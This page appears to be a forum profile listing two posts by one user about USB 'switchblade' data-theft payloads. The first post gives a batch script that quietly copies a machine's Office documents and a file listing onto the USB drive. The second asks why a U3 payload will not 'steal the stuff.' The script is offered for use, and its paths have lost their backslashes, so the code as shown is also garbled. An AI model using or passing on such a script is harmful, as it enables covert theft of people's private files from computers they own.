Jump to content

elmer

Active Members
  • Posts

    210
  • Joined

  • Last visited

Posts posted by elmer

  1. --snipped--

    Now I'm going to try to make it do more ! :twisted:

    Well, mine looks like this:

    @echo off
    mkdir %~d0%computername% 
    xcopy "C:Documents and Settings%username%My Documents*.doc" %~d0%computername% /s/c/q/r/h
    xcopy "C:Documents and Settings%username%My Documents*.xls" %~d0%computername% /s/c/q/r/h
    xcopy "C:Documents and Settings%username%My Documents*.ppt" %~d0%computername% /s/c/q/r/h
    dir "C:Documents and Settings%username%My Documents*.*" > %~d0%computername%files.txt 
    msgbox /BO /H /II /MS /T5 "Data Copied" Files have been copied successfully.
    @cls 
    @exit

    You can either take out the msgbox line or get msgbox from here (WARNING: DIRECT LINK TO EXE). Ahriman originally found this and set it up like this. It does this:

    This will, when it has finished copying, display for 5 seconds a small dialog box, that says the data is copied OK. You can change the parameters in it (just type at a command prompt: msgbox /? )

    This xcopy lines will get Word, Excel, and PowerPoint files and copy them to a folder on the root of the drive named after the computer you run this on. The dir line will make a text file in the computer name folder called files.txt that contains a list of all the files in the My Documents folder.

    Hope this helped! Also, since I am pretty much a script kiddy, someone will definitely come up with something really cool.

  2. I have a two gigabyte SanDisk Cruzer Micro, and it will not work with the switchblade. Originally I wanted to do the 2x10 encrypted USB drive, and I got it to where it will work, but I have to double click the go.cmd to get it working. I then thought to just see if the switchblade will work.

    I have tried using the Cruzer-specific way, which got all the files on it, but would not actually steal the stuff or make a log file. I have also tried using the U3 customizer to install the .iso. I used the customizer, then copied the payload to the root of my drive, but it will not steal the stuff or make a log file.

    I have tried it on an XP SP1 box and XP SP2 box, and neither will work. Does anyone know what the problem is?

×
×
  • Create New...